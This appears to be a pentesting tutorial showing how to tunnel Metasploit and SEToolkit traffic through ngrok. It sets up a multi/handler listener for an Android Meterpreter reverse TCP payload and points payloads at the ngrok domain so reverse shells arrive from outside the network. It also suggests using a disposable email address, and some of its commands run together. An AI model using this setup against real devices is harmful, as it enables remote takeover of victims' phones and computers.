It can be quite annoying when you have limited access to ports on a network and causes problems when pentesting, as you can only test traffic within the same network.
Unless of course you could open the correct ports from within the router default administration panel. There might be a time when access to administration panels are forbidden for example if you are using a mobile hotspot, sometimes you can’t detect corporate networks or you have spent the last hour and a half to learn how to do a port forward.
Whatever the case might be, here we will learn how to route your connections through a external secure tunnel and allowing us to use various pentesting tools such as Metasploit & SEToolkit outside our network.
- First of all create a disposable email address using getnada.com or a similar disposable email service. getnada
- Download ngrok In your browser go to ngrok.com and choose a download that suits your CPU architecture. Ngrok is a website that provides secure TCP tunnels for free. Once download has completed extract the Zip archive and then cd into it for example “cd ngrok”
Download Page For Ngrok I will be using NGrok 32 Bit in this tutorial if your using a 64 bit modern CPU then download 64 bit version of Ngrok - Install your authtoken (auth code below is a example copy auth token from ngrok.com account.Copy the authentication code from your account in ngrok.com we will be using this to authenticate our tunnel. You can do this by going to the folder where ngrok is stored and using .”/ngrok authtoken yourauthtokenhere ” The authentication code will then be saved.
Example Authtoken./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3
Screen Shot Shows Ngrok Auth Code
- To create your first secure tunnel use the command below to set up a tunnel on port 80 I’m using http port 80 for SET use whatever port you would like ngrok to tunnel through.
./ngrok http 80
Screen Shot shows ngrok successfully running a tunneling on HTTP port 80 the domain names in the screen shot are external domains of your tunnel. - Open the web interface at http://localhost:4040 to inspect and replay requests in a web browser of your choice.
Starting Metasploit First you will need to start Ngrok using tcp commands as Metasploit will be using a reverse TCP connection. Open up a new terminal and start Metasploit using command below../ngrok tcp 4444msfconsole
Use your local host to set srvhost and lhost.
set lhost 0.0.0.0 set lport 4444 set uripath /
Use port you used to set up ngrok as srvport this will help us with tunneling a Metasploit or SEToolkit session through the Internet.
In this tutorial I will set a handler up using settings above for Ngrok. Many reading this guide could be using complete different exploits to minify confusion we will be showing you set up a Reverse TCP Metapreter Listener. This will help later when setting up tunnels with other pentesting tools that use reverse connections.
msfconsole msf > use multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 0.0.0.0 msf exploit(handler) > set srvhost 0.0.0.0 msf exploit(handler) > set srvport 4444 msf exploit(handler) > set uripath / msf exploit(handler) > exploit
When your creating Payloads for Metasploit you will need to include your tunnel and also the port your using for Ngrok.
When creating payloads use the domain provided by Ngrok or you can ping the domain to receive and IP and use the IP address from the results use the same port for payload as your listener.
Example SEToolkit
Screen Shot Below Shows SEToolkit set up to use external host. This will work as a tunnel for many more pentesting tools this tutorial is not only limited to Metasploit and SEToolkit.
We have listed more tools below that will work with ngrok.
Generating Payloads with FatRAT
